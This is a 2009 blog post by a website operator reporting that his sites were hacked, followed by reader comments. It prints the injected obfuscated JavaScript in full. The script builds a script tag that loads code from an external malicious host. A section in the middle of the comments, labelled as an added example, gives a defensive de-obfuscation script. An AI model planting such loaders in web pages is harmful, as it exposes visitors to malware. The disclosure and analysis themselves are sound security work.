Website Hacked

Posted on: December 29 2009

Two websites I'm running, Ambiera.com and this site, Irrlicht3d.org, were hacked yesterday. We are not sure yet how this happened, but if you visited this blog or Ambiera.com yesterday between 10 and 12 o'clock (UTC +1), it might be a good idea to run some antivirus software on your PC. I cannot say what the attacker exactly wanted to do: somebody attached a JavaScript to the bottom of a few HTML pages. The code looked like this:

var Gldapnhsg069 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\^|\$|&|@|\!|\(|\)/ig, ''));var Hd1voqaixds8 = 'E1usw40fczkxa7';Gldapnhsg069.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.replace(/\)|\(|&|#|\^|\!|\$|@/ig, ''));Gldapnhsg069.setAttribute('src', 'h!&(t(t!(p#:))!^/#/#!$f^r&@!e(&e&#^o(@n$e!s)$-@&(c&^(o!$m^^@$.#b^@a($)d&#j&$^o&@$j$@o&)#.!c)$$o#!#&m((.@&$i@b^@i(@)(b)!()o^$@-$@(!!c$!o^!(@m&)^@^.($^t@h)e$&#@m&)o##b$#&)i@^&s!(i#t$#e!.&&(r)#u^^@@:&@8(#0!8^(&#!0&!@)/$$)#g(@)#o)(o(@)!g$l!#&)e)@)).)!!^c$&)o)m!/#@g!o$&o^g$(l)$$^e&#.!^c#&o)$(#m@()/&^j#!$r)!)j@.#^!c#!o@!@m&.!)#c$(#!n))/&m&@@e!)@d&#i)(!(a@$s!$e(t&@&#.)^@&i&#$(t@/((b$)a^&@&n)k(!^o()(f$&$a$$$m$e^(&r^i!((@c#((@a)).@@&c&!(o!#m&)/!^^'.replace(/\!|\$|&|@|\(|\)|#|\^/ig, ''));Gldapnhsg069.setAttribute('defer', 'd(!@e^()f$$(@e)#r@)'.replace(/@|\^|\)|\(|&|\$|\!|#/ig, ''));Gldapnhsg069.setAttribute('id', 'G@$@&0@!$&m&7$@@!p(@$!!x($c$d^$8$&c(^$$4&!w((^)4$$&@'.replace(/@|\$|\!|&|\)|\^|#|\(/ig, ''));document.body.appendChild(Gldapnhsg069);}} catch(Cla4d3870kj7) {}

(some random line breaks added by me for security)
I have not looked at what this actually does, but if you are interested, feel free to have a look at this. Thanks to Jetro for quickly letting me know about this problem!





Comments:


Looks like this is not a complete piece of code.
Commented the code out to avoid problems and renamed "Gldapnhsg069" to "scriptElement" for better reading:


/*

var scriptElement = document.createElement( 'script' );

var Hd1voqaixds8 = 'E1usw40fczkxa7';

scriptElement.setAttribute( 'type', 'text/javascript' );
scriptElement.setAttribute( 'src', 'HERE COMES AN ADDRESS');
scriptElement.setAttribute( 'defer', 'defer' );
scriptElement.setAttribute( 'id', 'G0m7px8c4w4' );

document.body.appendChild( scriptElement );

}} catch(Cla4d3870kj7) {}

*/
KIENI
2009-12-29 08:33:00
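
The manual clean-up shown in the comment above can be done mechanically, without ever running the injected script. The following is an added example, not part of the original post or its comments; the sample input, its example.invalid URL, and all function names are constructed for illustration.

```javascript
// Statically rewrite  'junk'.replace(/pattern/flags, '')  into the plain string
// it evaluates to. The script itself is never executed: only the junk-stripping
// regex is rebuilt and applied to the literal's text.
// Assumption: literals contain no backslash escapes that need unescaping.
const OBFUSCATED_LITERAL =
  /'((?:[^'\\]|\\.)*)'\s*\.replace\(\s*\/((?:[^\/\\\n]|\\.)+)\/([a-z]*)\s*,\s*''\s*\)/g;

function deobfuscate(source) {
  return source.replace(OBFUSCATED_LITERAL, (whole, literal, pattern, flags) => {
    try {
      return JSON.stringify(literal.replace(new RegExp(pattern, flags), ''));
    } catch {
      return whole; // malformed pattern or flags: leave the text untouched
    }
  });
}

// Report whether the cleaned-up source builds a <script> element and, if so,
// which external URL it is pointed at.
function findInjectedScriptSrc(source) {
  const readable = deobfuscate(source);
  const createsScript = /createElement\(\s*["']script["']\s*\)/i.test(readable);
  const src = readable.match(/setAttribute\(\s*["']src["']\s*,\s*"([^"]*)"\s*\)/);
  return { readable, createsScript, src: src ? src[1] : null };
}

// Constructed sample in the same style as the injected code (not the real payload).
const SAMPLE =
  "var a = document.createElement('s$@c#r^i&p@t'.replace(/#|\\^|\\$|&|@/ig, ''));" +
  "a.setAttribute('src', 'h!t(t)p!:/#/e!x(a)m#p!l(e.i)n#v!a(l)i#d/x!.(j)s'" +
  ".replace(/\\!|\\(|\\)|#/ig, ''));" +
  "document.body.appendChild(a);";

const report = findInjectedScriptSrc(SAMPLE);
console.log(report.readable);
console.log('creates <script>:', report.createsScript, '| src:', report.src);
```

Run it with Node.js on a saved copy of the suspicious file's contents; the reported `src` is the host to look for in proxy and DNS logs.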


This was the whole script, except where it was trying to invoke itself of course (set it to window.onload). Also, I omitted a comment in the beginning with the only content 'GNU GPL', but that was all.
niko
2009-12-29 09:16:00


Yesterday, irrFuscator was briefly mentioned in this talk at the Chaos Communication Congress: http://events.ccc.de/congress/2009/Fahrplan/events/3494.en.html

Maybe some script kiddie in the audience had a stupid idea?
ak
2009-12-29 12:10:00


hm, interesting (thanks for the link, btw) could be an idea.. :)
niko
2009-12-29 18:55:00


Are you using weak or commonly used passwords (the same as on other websites)?
ale
2009-12-30 05:12:00


no, it's not a weak password, but there is only one: it's only one website, with different domains.
niko
2009-12-30 11:19:00


That is fucking sick.
The same day, around the same time, my WordPress blog got hacked - code looked the same (js & index.phps overwritten) and a private phpBB3 forum of mine, both running on different servers!
And as that's not enough, the forum hack installed trojans on my two PCs... (syszid)
christian
2009-12-31 09:55:00

